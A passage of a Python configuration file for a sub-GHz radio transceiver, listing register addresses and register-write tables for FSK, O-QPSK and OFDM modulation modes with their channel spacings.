RG_BBC0_FSKDM = [0x03, 0x72]
RG_BBC0_FSKPE0 = [0x03, 0x73]
RG_BBC0_FSKPE1 = [0x03, 0x74]
RG_BBC0_FSKPE2 = [0x03, 0x75]
RG_BBC0_FSKSDF0L = [0x03, 0x66]
RG_BBC0_FSKSDF0H = [0x03, 0x67]
RG_BBC0_FSKSDF1L = [0x03, 0x68]
RG_BBC0_FSKSDF1H = [0x03, 0x69]
RG_BBC1_IRQM = [0x04, 0x00]
RG_BBC1_PC = [0x04, 0x01]
RG_BBC1_PS = [0x04, 0x02]
RG_BBC1_RXFLL = [0x04, 0x04]
RG_BBC1_RXFLH = [0x04, 0x05]
RG_BBC1_TXFLL = [0x04, 0x06]
RG_BBC1_TXFLH = [0x04, 0x07]
RG_BBC1_FBLL = [0x04, 0x08]
RG_BBC1_FBLH = [0x04, 0x09]
RG_BBC1_FBLIL = [0x04, 0x0A]
RG_BBC1_FBLIH = [0x04, 0x0B]
RG_BBC1_OFDMPHRTX = [0x04, 0x0C]
RG_BBC1_OFDMPHRRX = [0x04, 0x0D]
RG_BBC1_OFDMC = [0x04, 0x0E]
RG_BBC1_OFDMSW = [0x04, 0x0F]
RG_BBC1_OQPSKC0 = [0x04, 0x10]
RG_BBC1_OQPSKC1 = [0x04, 0x11]
RG_BBC1_OQPSKC2 = [0x04, 0x12]
RG_BBC1_OQPSKC3 = [0x04, 0x13]
RG_BBC1_OQPSKPHRTX = [0x04, 0x14]
RG_BBC1_OQPSKPHRRX = [0x04, 0x15]
RG_BBC1_FSKC0 = [0x04, 0x60]
RG_BBC1_FSKC1 = [0x04, 0x61]
RG_BBC1_FSKC2 = [0x04, 0x62]
RG_BBC1_FSKC3 = [0x04, 0x63]
RG_BBC1_FSKC4 = [0x04, 0x64]
RG_BBC1_FSKPHRTX = [0x04, 0x6A]
RG_BBC1_FSKPHRRX = [0x04, 0x6B]
RG_BBC1_FSKDM = [0x04, 0x72]
RG_BBC1_FSKPE0 = [0x04, 0x73]
RG_BBC1_FSKPE1 = [0x04, 0x74]
RG_BBC1_FSKPE2 = [0x04, 0x75]
RG_BBC1_FSKSDF0L = [0x04, 0x66]
RG_BBC1_FSKSDF0H = [0x04, 0x67]
RG_BBC1_FSKSDF1L = [0x04, 0x68]
RG_BBC1_FSKSDF1H = [0x04, 0x69]
RG_BBC0_FBRXS = [0x20, 0x00]
RG_BBC0_FBRXE = [0x27, 0xFE]
RG_BBC0_FBTXS = [0x28, 0x00]
RG_BBC0_FBTXE = [0x2F, 0xFE]
RG_BBC1_FBRXS = [0x30, 0x00]
RG_BBC1_FBRXE = [0x37, 0xFE]
RG_BBC1_FBTXS = [0x38, 0x00]
RG_BBC1_FBTXE = [0x3F, 0xFE]
OFDMPHRRX_MCS_MASK = 0x07
modulations_settings_ch_spacing = {
'2fsk_50kbps_FEC_200kHz' : [200, 863125],
'2fsk_100kbps_FEC_400kHz' : [400, 863225],
'4fsk_200kbps_FEC_400kHz' : [400, 863225],
'2fsk_50kbps_200kHz' : [200,863125],
'2fsk_100kbps_400kHz' : [400,863225],
'4fsk_200kbps_400kHz' : [400,863225],
'ofdm_100kbps_1200kHz_mcs0' : [1200,863625],
'ofdm_200kbps_1200kHz_mcs1' : [1200,863625],
'ofdm_400kbps_1200kHz_mcs2' : [1200,863625],
'ofdm_800kbps_1200kHz_mcs3' : [1200,863625],
'ofdm_50kbps_800kHz_mcs0' : [800,863425],
'ofdm_100kbps_800kHz_mcs1' : [800,863425],
'ofdm_200kbps_800kHz_mcs2' : [800,863425],
'ofdm_400kbps_800kHz_mcs3' : [800,863425],
'ofdm_600kbps_800kHz_mcs4' : [800,863425],
'ofdm_800kbps_800kHz_mcs5' : [800,863425],
'ofdm_50kbps_400kHz_mcs1' : [400,863225],
'ofdm_100kbps_400kHz_mcs2' : [400,863225],
'ofdm_200kbps_400kHz_mcs3' : [400,863225],
'ofdm_300kbps_400kHz_mcs4' : [400,863225],
'ofdm_400kbps_400kHz_mcs5' : [400,863225],
'ofdm_600kbps_400kHz_mcs6' : [400,863225],
'ofdm_50kbps_200kHz_mcs2' : [200,863125],
'ofdm_100kbps_200kHz_mcs3' : [200,863125],
'ofdm_150kbps_200kHz_mcs4' : [200,863125],
'ofdm_200kbps_200kHz_mcs5' : [200,863125],
'ofdm_300kbps_200kHz_mcs6' : [200,863125],
'oqpsk_6.25kbps_600kHz' : [100,868300], # I had 600 kHz, but I think it is wrong
'oqpsk_12.5kbps_600kHz' : [100,868300], #, I had 600 kHz, but I think it is wrong
'oqpsk_25kbps_600kHz' : [100,868300], # I had 600 kHz, but I think it is wrong
'oqpsk_50kbps_600kHz' : [100,868300] # I had 600 kHz, but I think it is wrong
}
modulations_settings = {
# fsk_option1_FEC
'2fsk_50kbps_FEC_200kHz': [
(RG_RF09_CMD, 0x02), # we make sure we are in the trxoff state
(RG_RF09_IRQM, 0x1F), # TRXERR, BATLOW, EDC, TRXRDY, WAKEUP interrupts enabled
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x00),
(RG_RF09_RXDFE, 0x2A), # RCUT = 1, bits 5-7. bit 4 not used.
(RG_RF09_AGCC, 0x01),
(RG_RF09_AGCS, 0x37),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0xC0),
(RG_RF09_TXDFE, 0x98),
(RG_RF09_PAC, 0x74), # // Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. 0x14~8 dBm
(RG_BBC0_IRQM, 0x12), # TXFE, RXFE, interrupts enabled
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x15), # // NO FCS FILTER in RX, FCS automatically added in TX, 32 bits FCS, FSK.
(RG_BBC0_FSKDM, 0x01), # //Direct modulation enabled and Pre-emphasis disabled.
(RG_BBC0_FSKC0, 0xD6),
(RG_BBC0_FSKC1, 0x00),
# (RG_BBC0_FSKC2, 0x41), # NRNSC and Interleaving
(RG_BBC0_FSKC3, 0x85),
(RG_BBC0_FSKC4, 0x0A), # //FEC enabled. IEEE MODE
(RG_BBC0_FSKPE0, 0x02),
(RG_BBC0_FSKPE1, 0x03),
(RG_BBC0_FSKPE2, 0xFC),
(RG_BBC0_FSKPHRTX, 0x00)],
# fsk_option2_FEC
'2fsk_100kbps_FEC_400kHz': [
(RG_RF09_CMD, 0x02), # //we make sure we are in the trxoff state
(RG_RF09_IRQM, 0x1F), # // TRXERR, BATLOW, EDC, TRXRDY, WAKEUP interrupts enabled
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x03),
(RG_RF09_RXDFE, 0x25), # RCUT = 1, bits 5-7. bit 4 not used.
(RG_RF09_AGCC, 0x01),
(RG_RF09_AGCS, 0x37),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x83),
(RG_RF09_TXDFE, 0x94),
(RG_RF09_PAC, 0x74), # // Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. 0x14~8 dBm
(RG_BBC0_IRQM, 0x12), # // TXFE, RXEM, RXAM, RXFE, RXFS interrupts enabled
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x15), # // NO FCS FILTER in RX, FCS automatically added in TX, 32 bits FCS, FSK.
(RG_BBC0_FSKDM, 0x01), # //Direct modulation enabled and Pre-emphasis disabled.
(RG_BBC0_FSKC0, 0xD6),
(RG_BBC0_FSKC1, 0x01),
# (RG_BBC0_FSKC2, 0x41), # NRNSC and Interleaving
(RG_BBC0_FSKC3, 0x85),
(RG_BBC0_FSKC4, 0x0A), # //FEC enabled. IEEE MODE
(RG_BBC0_FSKPE0, 0x0E),
(RG_BBC0_FSKPE1, 0x0F),
(RG_BBC0_FSKPE2, 0xF0),
(RG_BBC0_FSKPHRTX, 0x00)],
# fsk_option3_FEC
'4fsk_200kbps_FEC_400kHz': [
(RG_RF09_CMD, 0x02), # //we make sure we are in the trxoff state
(RG_RF09_IRQM, 0x1F), # // TRXERR, BATLOW, EDC, TRXRDY, WAKEUP interrupts enabled
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x03), # //IF shift, 200 kHz bandwidth
(RG_RF09_RXDFE, 0x25), # //find the right values
(RG_RF09_AGCC, 0x01),
(RG_RF09_AGCS, 0x37),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x83), #
(RG_RF09_TXDFE, 0x94), # //find the right values
(RG_RF09_PAC, 0x74), # // Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. 0x14~8 dBm
(RG_BBC0_IRQM, 0x12), # // TXFE, RXFE interrupts enabled. RXFS , RXEM, RXAM, disabled
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x15), # // NO FCS FILTER in RX, FCS automatically added in TX, 32 bits FCS, FSK.
(RG_BBC0_FSKDM, 0x01), # //Direct modulation enabled and Pre-emphasis disabled.
(RG_BBC0_FSKSDF0L, 0xBE),
(RG_BBC0_FSKSDF0H, 0xFF),
# (RG_BBC0_FSKSDF1L, 0xAE),
# (RG_BBC0_FSKSDF1H, 0xBF),
(RG_BBC0_FSKC0, 0xD7),
(RG_BBC0_FSKC1, 0x01), # 1 = 100 kHz symbol rate, 3 = 200 kHz
# (RG_BBC0_FSKC2, 0x41), # NRNSC and Interleaving
(RG_BBC0_FSKC3, 0x85),
(RG_BBC0_FSKC4, 0x22),
(RG_BBC0_FSKPE0, 0x0E),
(RG_BBC0_FSKPE1, 0x0F),
(RG_BBC0_FSKPE2, 0xF0),
(RG_BBC0_FSKPHRTX, 0x00)],
# fsk_option1
'2fsk_50kbps_200kHz': [
(RG_RF09_CMD, 0x02), # //we make sure we are in the trxoff state
(RG_RF09_IRQM, 0x1F), # // TRXERR, BATLOW, EDC, TRXRDY, WAKEUP interrupts enabled
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x00), # 0 IFS, 50 kHz symbol rate
(RG_RF09_RXDFE, 0x2A), # RCUT = 1 , SR = 10
(RG_RF09_AGCC, 0x01),
(RG_RF09_AGCS, 0x37),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0xC0),
(RG_RF09_TXDFE, 0x98),
(RG_RF09_PAC, 0x74), # // Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. 0x14~8 dBm
(RG_BBC0_IRQM, 0x12), # // TXFE, RXEM, RXAM, RXFE, RXFS interrupts enabled
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x15), # // NO FCS FILTER in RX, FCS automatically added in TX, 32 bits FCS, FSK.
(RG_BBC0_FSKDM, 0x01), # //Direct modulation enabled and Pre-emphasis disabled.
(RG_BBC0_FSKC0, 0xD6),
(RG_BBC0_FSKC1, 0x00),
# (RG_BBC0_FSKC2, 0x41), # NRNSC and Interleaving
(RG_BBC0_FSKC3, 0x85),
(RG_BBC0_FSKC4, 0x00), # //FEC disabled. IEEE MODE
(RG_BBC0_FSKPE0, 0x02),
(RG_BBC0_FSKPE1, 0x03),
(RG_BBC0_FSKPE2, 0xFC),
(RG_BBC0_FSKPHRTX, 0x08)], # using SDF 1
# fsk_option2
'2fsk_100kbps_400kHz': [
(RG_RF09_CMD, 0x02), # //we make sure we are in the trxoff state
(RG_RF09_IRQM, 0x1F), # // TRXERR, BATLOW, EDC, TRXRDY, WAKEUP interrupts enabled
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x03), # 0 IFS, 100 kHz symbol rate
(RG_RF09_RXDFE, 0x25), # RCUT = 1 , SR = 5
(RG_RF09_AGCC, 0x01),
(RG_RF09_AGCS, 0x37),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x83),
(RG_RF09_TXDFE, 0x94),
(RG_RF09_PAC, 0x74), # // Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. 0x14~8 dBm
(RG_BBC0_IRQM, 0x12), # // TXFE, RXEM, RXAM, RXFE, RXFS interrupts enabled
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x15), # // NO FCS FILTER in RX, FCS automatically added in TX, 32 bits FCS, FSK.
(RG_BBC0_FSKDM, 0x01), # //Direct modulation enabled and Pre-emphasis disabled.
(RG_BBC0_FSKC0, 0xD6),
(RG_BBC0_FSKC1, 0x01),
# (RG_BBC0_FSKC2, 0x41), # NRNSC and Interleaving
(RG_BBC0_FSKC3, 0x85),
(RG_BBC0_FSKC4, 0x00), # //FEC disabled. IEEE MODE
(RG_BBC0_FSKPE0, 0x0E),
(RG_BBC0_FSKPE1, 0x0F),
(RG_BBC0_FSKPE2, 0xF0),
(RG_BBC0_FSKPHRTX, 0x08)], # using SDF1
# fsk_option3
'4fsk_200kbps_400kHz': [
(RG_RF09_CMD, 0x02), # //we make sure we are in the trxoff state
(RG_RF09_IRQM, 0x1F), # // TRXERR, BATLOW, EDC, TRXRDY, WAKEUP interrupts enabled
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x03), # //IFS 1, 200 kHz
(RG_RF09_RXDFE, 0x25), # # RCUT = 2 , SR = 4
(RG_RF09_AGCC, 0x01),
(RG_RF09_AGCS, 0x37),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x83), #
(RG_RF09_TXDFE, 0x94), #
(RG_RF09_PAC, 0x74), # // Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. 0x14~8 dBm
(RG_BBC0_IRQM, 0x12), # // TXFE, RXEM, RXAM, RXFE, RXFS interrupts enabled
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x15), # // NO FCS FILTER in RX, FCS automatically added in TX, 32 bits FCS, FSK.
(RG_BBC0_FSKDM, 0x01), # //Direct modulation enabled and Preemphasis disabled.
(RG_BBC0_FSKSDF0L, 0xEB),
(RG_BBC0_FSKSDF0H, 0xAA),
# (RG_BBC0_FSKSDF1L, 0xAE),
# (RG_BBC0_FSKSDF1H, 0xBF),
(RG_BBC0_FSKC0, 0xD7),
(RG_BBC0_FSKC1, 0x01), # 1 = 200 kHz symbol rate, 3 = 400 kHz
# (RG_BBC0_FSKC2, 0x41), # NRNSC and Interleaving
(RG_BBC0_FSKC3, 0x85),
(RG_BBC0_FSKC4, 0x20), # FEC disabled
(RG_BBC0_FSKPE0, 0x0E),
(RG_BBC0_FSKPE1, 0x0F),
(RG_BBC0_FSKPE2, 0xF0),
(RG_BBC0_FSKPHRTX, 0x00)],
# oqpsk_rate0
'oqpsk_6.25kbps_600kHz': [
(RG_BBC0_PC, 0x17),
(RG_BBC0_OQPSKPHRTX, 0x00), # MR-OQPSK, rate mode 0
(RG_BBC0_OQPSKC0, 0x10), # 100kchips/s, RC-0.8 shaping, direct-modulation enabled
(RG_BBC0_OQPSKC1, 0xB8),#// MINIMUM preamble-detection sensitivity for SUN-O-QPSK, MAXIMUM for LEGACY OQPSK, rx-override enabled
(RG_BBC0_OQPSKC2, 0x04),#// listen for MR-OQPSK frames only
(RG_BBC0_OQPSKC3, 0x00),#// legacy OQPSK, search for SFD_1 only
(RG_BBC0_IRQM, 0x13), # // TXFE, RXFE, RXFS interrupts enabled
(RG_BBC1_IRQM, 0x00),
(RG_RF09_IRQM, 0x12), # // TRXERR, TRXRDY interrupts enabled
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x00), # Rx BW 160kHz, IF 250kHz
(RG_RF09_RXDFE, 0x2A), # //
(RG_RF09_AGCC, 0x21),
(RG_RF09_EDD, 0x2B),
(RG_RF09_AGCS, 0x77),
(RG_RF09_TXCUTC, 0xC7), # .PARAMP = 3, .LPFCUT = 7
(RG_RF09_TXDFE, 0x7A), # // .SR = 0xA, .RCUT = 3
(RG_RF09_PAC, 0x75)], # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x15~8 dBm
# oqpsk_rate1
'oqpsk_12.5kbps_600kHz': [
(RG_BBC0_PC, 0x17),
(RG_BBC0_OQPSKPHRTX, 0x02), # MR-OQPSK, rate mode 1
(RG_BBC0_OQPSKC0, 0x10), # 100kchips/s, RC-0.8 shaping, direct-modulation enabled
(RG_BBC0_OQPSKC1, 0xB8),#// MINIMUM preamble-detection sensitivity for SUN-O-QPSK, MAXIMUM for LEGACY OQPSK, rx-override enabled
(RG_BBC0_OQPSKC2, 0x00), # listen for MR-OQPSK frames only
(RG_BBC0_OQPSKC3, 0x00), # legacy OQPSK, search for SFD_1 only
(RG_BBC0_IRQM, 0x13), # // TXFE, RXFE, RXFS interrupts enabled
(RG_BBC1_IRQM, 0x00),
(RG_RF09_IRQM, 0x12), # // TRXERR, TRXRDY interrupts enabled
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x00), # // Rx BW 160kHz, IF 250kHz
(RG_RF09_RXDFE, 0x2A), # //
(RG_RF09_AGCC, 0x21),
(RG_RF09_EDD, 0x2B),
(RG_RF09_AGCS, 0x77),
(RG_RF09_TXCUTC, 0xC7), # // .PARAMP = 3, .LPFCUT = 7
(RG_RF09_TXDFE, 0x7A), # // .SR = 0xA, .RCUT = 3
(RG_RF09_PAC, 0x75)], # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x15~8 dBm
# oqpsk_rate2
'oqpsk_25kbps_600kHz': [
(RG_BBC0_PC, 0x17),
(RG_BBC0_OQPSKPHRTX, 0x04), # // MR-OQPSK, rate mode 2
(RG_BBC0_OQPSKC0, 0x10), # // 100kchips/s, RC-0.8 shaping, direct-modulation enabled
(RG_BBC0_OQPSKC1, 0xB8), #// MINIMUM preamble-detection sensitivities, rx-override disabled
(RG_BBC0_OQPSKC2, 0x04), # // listen for MR-OQPSK frames only
(RG_BBC0_OQPSKC3, 0x00), # // legacy OQPSK, search for SFD_1 only
(RG_BBC0_IRQM, 0x13), # // TXFE, RXFE, RXFS interrupts enabled
(RG_BBC1_IRQM, 0x00),
(RG_RF09_IRQM, 0x12), # // TRXERR, TRXRDY interrupts enabled
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x00), # // Rx BW 160kHz, IF 250kHz
(RG_RF09_RXDFE, 0x2A), # //
(RG_RF09_AGCC, 0x21),
(RG_RF09_EDD, 0x2B),
(RG_RF09_AGCS, 0x77),
(RG_RF09_TXCUTC, 0xC7), # # .PARAMP = 3, .LPFCUT = 7
(RG_RF09_TXDFE, 0x7A), # # .SR = 0xA, .RCUT = 3
(RG_RF09_PAC, 0x75)], # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x15~8 dBm
# oqpsk_rate3
'oqpsk_50kbps_600kHz': [
(RG_BBC0_PC, 0x17),
(RG_BBC0_OQPSKPHRTX, 0x06), # # MR-OQPSK, rate mode 3
(RG_BBC0_OQPSKC0, 0x10), ## 100kchips/s, RC-0.8 shaping, direct-modulation enabled
(RG_BBC0_OQPSKC1, 0xB8), # MINIMUM preamble-detection sensitivities, rx-override disabled
(RG_BBC0_OQPSKC2, 0x00), # listen for MR-OQPSK frames only
(RG_BBC0_OQPSKC3, 0x00), # legacy OQPSK, search for SFD_1 only
(RG_BBC0_IRQM, 0x13), # # TXFE, RXFE, RXFS interrupts enabled
(RG_BBC1_IRQM, 0x00),
(RG_RF09_IRQM, 0x12), # # TRXERR, TRXRDY interrupts enabled
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x00), # # Rx BW 160kHz, IF 250kHz
(RG_RF09_RXDFE, 0x2A), # #
(RG_RF09_AGCC, 0x21),
(RG_RF09_EDD, 0x2B),
(RG_RF09_AGCS, 0x77),
(RG_RF09_TXCUTC, 0xC7), # # .PARAMP = 3, .LPFCUT = 7
(RG_RF09_TXDFE, 0x7A), # # .SR = 0xA, .RCUT = 3
(RG_RF09_PAC, 0x75)], # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x15~8 dBm
# subGHz_ofdm_1_mcs0
'subGHz_ofdm_100kbps_1200kHz_mcs0': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x19),
(RG_RF09_RXDFE, 0x83),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x0A), # recommended value (0x0B)
(RG_RF09_TXDFE, 0x83),
(RG_RF09_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x00),
(RG_BBC0_OFDMPHRTX, 0x00)],
# subGHz_ofdm_1_mcs1
'subGHz_ofdm_200kbps_1200kHz_mcs1': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x19),
(RG_RF09_RXDFE, 0x83),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x0A), # recommended value (0x0B)
(RG_RF09_TXDFE, 0x83),
(RG_RF09_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x00),
(RG_BBC0_OFDMPHRTX, 0x01)],
# subGHz_ofdm_1_mcs2
'subGHz_ofdm_400kbps_1200kHz_mcs2': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x19),
(RG_RF09_RXDFE, 0x83),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x0A), # recommended value (0x0B)
(RG_RF09_TXDFE, 0x83),
(RG_RF09_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x00),
(RG_BBC0_OFDMPHRTX, 0x02)],
# subGHz_ofdm_1_mcs3
'subGHz_ofdm_800kbps_1200kHz_mcs3': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x19),
(RG_RF09_RXDFE, 0x83),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x0A), # recommended value (0x0B)
(RG_RF09_TXDFE, 0x83),
(RG_RF09_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x00),
(RG_BBC0_OFDMPHRTX, 0x03)],
# subGHz_ofdm_2_mcs0
'subGHz_ofdm_50kbps_800kHz_mcs0': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x17),
(RG_RF09_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x08), # recommended value ()
(RG_RF09_TXDFE, 0x63),
(RG_RF09_PAC, 0x7C), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1C~8dBm
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x01),
(RG_BBC0_OFDMPHRTX, 0x00)],
# subGHz_ofdm_2_mcs1
'subGHz_ofdm_100kbps_800kHz_mcs1': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x17),
(RG_RF09_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x08), # recommended value ()
(RG_RF09_TXDFE, 0x63),
(RG_RF09_PAC, 0x7C), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1C~8dBm
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x01),
(RG_BBC0_OFDMPHRTX, 0x01)],
# subGHz_ofdm_2_mcs2
'subGHz_ofdm_200kbps_800kHz_mcs2': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x17),
(RG_RF09_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x08), # recommended value ()
(RG_RF09_TXDFE, 0x63),
(RG_RF09_PAC, 0x7C), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1C~8dBm
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x01),
(RG_BBC0_OFDMPHRTX, 0x02)],
# subGHz_ofdm_2_mcs3
'subGHz_ofdm_400kbps_800kHz_mcs3': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x17),
(RG_RF09_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x08), # recommended value ()
(RG_RF09_TXDFE, 0x63),
(RG_RF09_PAC, 0x7C), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1C~8dBm
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x01),
(RG_BBC0_OFDMPHRTX, 0x03)],
# subGHz_ofdm_2_mcs4
'subGHz_ofdm_600kbps_800kHz_mcs4': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x17),
(RG_RF09_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x08), # recommended value ()
(RG_RF09_TXDFE, 0x63),
(RG_RF09_PAC, 0x7C), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1C~8dBm
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x01),
(RG_BBC0_OFDMPHRTX, 0x04)],
# subGHz_ofdm_2_mcs5
'subGHz_ofdm_800kbps_800kHz_mcs5': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x17),
(RG_RF09_RXDFE, 0x43),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x08), # recommended value ()
(RG_RF09_TXDFE, 0x63),
(RG_RF09_PAC, 0x7C), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1C~8dBm
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x01),
(RG_BBC0_OFDMPHRTX, 0x05)],
# subGHz_ofdm_3_mcs1
'subGHz_ofdm_50kbps_400kHz_mcs1': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x04),
(RG_RF09_RXDFE, 0x46),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x05), # recommended value ()
(RG_RF09_TXDFE, 0x66),
(RG_RF09_PAC, 0x7D), # Tx Power 5 bits >>. 0x64 = txPwr=>0x04, max: 0x1F. # 0x1D~8dBm
(RG_BBC0_IRQM, 0x12),
(RG_BBC1_IRQM, 0x00),
(RG_BBC0_PC, 0x16), # NO FCS FILTER in RX, FCS automatically added in TX
(RG_BBC0_OFDMC, 0x02),
(RG_BBC0_OFDMPHRTX, 0x01)],
# subGHz_ofdm_3_mcs2
'subGHz_ofdm_100kbps_400kHz_mcs2': [
(RG_RF09_CMD, 0x02),
(RG_RF09_IRQM, 0x1F),
(RG_RF24_IRQM, 0x00),
(RG_RF09_RXBWC, 0x04),
(RG_RF09_RXDFE, 0x46),
# (RG_RF09_AGCC, 0x11),
(RG_RF09_EDD, 0x7A),
(RG_RF09_TXCUTC, 0x05), # recommended value ()
(RG_RF09_TXDFE, 0x66),
